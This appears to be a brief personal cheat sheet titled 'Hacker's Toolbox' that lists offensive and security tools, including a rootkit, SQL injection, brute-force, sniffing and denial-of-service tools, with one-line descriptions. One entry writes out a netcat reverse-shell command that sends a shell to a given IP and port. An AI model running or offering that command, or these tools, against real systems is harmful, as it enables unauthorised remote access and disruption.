Hacker’s Toolbox
| Name | description |
|---|---|
| vlany | a Linux rootkit |
| sqlmap | automated SQL injection |
| nmap | network scanner |
| openvas | vulnrability scanner |
| burpsuite | intercepting proxy, with a lot of nice features |
| John the ripper | password decryption |
| LOIC | DOS tool (for windows) |
| slowhttptest | DOS tool for linux (tested on kali) |
| metasploit | malware generator and much more |
| etherape | GUI showing eth interface traffic |
| Hydra | Password bruteforcing |
| Driftnet | captures images sent on wire (non https) |
| urlsnarf | captures HTTP requests |
| nc -e /bin/sh ip port | sends a shell to the ip |
| nikto | web vulnrability checker |
| dirb | web brute forcer |
| crunch | wordlist generator |
| wpscan | scan for wordpress vulnerabilities |
useful links: reverse shells